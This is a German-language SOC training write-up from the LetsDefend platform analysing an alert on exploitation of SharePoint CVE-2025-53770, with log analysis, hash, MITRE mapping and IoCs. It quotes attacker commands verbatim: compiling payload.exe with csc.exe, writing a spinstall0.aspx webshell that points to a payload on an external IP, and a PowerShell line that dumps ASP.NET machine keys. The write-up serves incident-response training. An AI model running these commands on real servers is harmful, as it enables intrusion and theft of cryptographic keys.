Eine Aktivität zur Schulung von Analysefähigkeiten und Berichterstattung
Dies ist eine Untersuchung, die auf der Let's Defend-Plattform durchgeführt wurde, basierend auf einer aktuellen SharePoint-CVE. Werfen wir einen Blick darauf.
Die SOC342-Regel hat eine nicht authentifizierte POST-Anfrage erkannt, die auf die anfällige ToolPane.aspx-Seite abzielt, mit folgenden Merkmalen:
Ein externer Benutzer (IP: 107.191.58.76) hat eine präparierte Anfrage an einen internen SharePoint-Server (172.16.20.17) gesendet.
Analysiere das Log unseres Endpunkts
Ein w3wp.exe-Prozess, der einen codierten PowerShell-Befehl ausführt, kann auf eine potenzielle Exploit- oder Post-Exploitation-Aktivität hinweisen (z.B. Ausführung eines versteckten Payloads).
In einer SharePoint-Umgebung ist es wichtig zu überprüfen, ob dieses Verhalten erwartet wird oder ob es einen Missbrauch darstellt.
Der Befehl wurde mit base64 verschleiert
Dieses Payload ermöglicht dem Angreifer, kritische ASP.NET-Konfigurationsschlüssel von dem Rechner, auf dem es ausgeführt wird, zu extrahieren und auszugeben.
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Kompiliert eine ausführbare Datei aus C#-Quellcode auf dem Server.
Erstellt eine Web-Backdoor (bösartige ASPX-Datei) im SharePoint-Pfad, die beim Besuch die Ausführung oder das Herunterladen eines externen Payloads ermöglicht.
cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Dieser Befehl erstellt eine Datei namens spinstall0.aspx im SharePoint-LAYOUTS-Ordner und schreibt den Inhalt hinein (hier ist ein Platzhalter, der den Code einer Webshell darstellt).
Dies ist der Hash von spinstall0.apx 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514
Werfen wir einen Blick auf VirusTotal.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
Dieser Befehl ermöglicht es dem Angreifer, auf die Anwendungskonfiguration von MachineKeySection zuzugreifen, was sensible kryptografische Schlüssel wie den Validierungsschlüssel und den Entschlüsselungsschlüssel offenlegen kann.
Diese Schlüssel sind für die ASP.NET-Sicherheit von entscheidender Bedeutung und schützen Dinge wie Authentifizierungs-Cookies und ViewState.
Das Offenlegen oder Abrufen dieser Schlüssel kann es Angreifern ermöglichen, Authentifizierungs-Token zu fälschen, geschützte Daten zu entschlüsseln oder andere Angriffe gegen die Webanwendung durchzuführen.
MITRE ATT&CK

Analystennotiz:
Der Alarm wurde aufgrund ungewöhnlicher PowerShell-Aktivitäten auf einem SharePoint-Server ausgelöst, die später als Exploit-Versuch gegen CVE-2025-53770 identifiziert wurden. Der Angreifer legte zunächst eine benutzerdefinierte C#-ausführbare Datei (payload.exe) ab und kompilierte sie mit dem C#-Compiler (csc.exe), erstellte dann eine bösartige ASPX-Webshell (spinstall0.aspx) in einem webzugänglichen SharePoint-Verzeichnis. Anschließend wurde ein PowerShell-Befehl ausgeführt, um sensible kryptografische Maschinenschlüssel über .NET-Reflection aus der Serverkonfiguration abzurufen. Diese Abfolge von Aktionen deutet auf einen mehrphasigen Angriff hin, der darauf abzielt, eine dauerhafte Kontrolle zu behalten und möglicherweise Authentifizierungs-Token zu fälschen. Die Webshell wurde als bösartig bestätigt mit einem VirusTotal-Erkennungsverhältnis von 39/62. Der Vorfall wurde als True Positive bestätigt, und es werden weitere Eindämmungs- und Abhilfemaßnahmen empfohlen.

CVE-2025-53770 Detail
Deserialisierung nicht vertrauenswürdiger Daten in einer lokalen Microsoft SharePoint Server-Instanz ermöglicht einem nicht autorisierten Angreifer die Codeausführung über ein Netzwerk. Microsoft ist bekannt, dass ein Exploit für CVE-2025-53770 in freier Wildbahn existiert. Microsoft bereitet ein umfassendes Update vor und testet es gründlich, um diese Schwachstelle zu beheben. Stellen Sie in der Zwischenzeit bitte sicher, dass die in dieser CVE-Dokumentation bereitgestellte Abschwächung implementiert ist, um vor Ausnutzung geschützt zu sein.

Von Microsoft vorgeschlagene Abschwächungsmaßnahmen: Um potenzielle Angriffe abzuschwächen, sollten Kunden:
IoC
Spinstall0.aspx Von Bedrohungsakteuren verwendete Webshell
Die Akteure haben den Dateinamen auch auf verschiedene Weise geändert – wie z.B. spinstall.aspx, spinstall1.aspx, spinstall2.aspx
Dieser Bericht basiert auf einer Aktivität, die auf der Let’s Defend-Plattform durchgeführt wurde. Alle präsentierten Erkenntnisse und Materialien dienen nur zu Bildungszwecken. Alle Rechte und das Eigentum gehören Let’s Defend.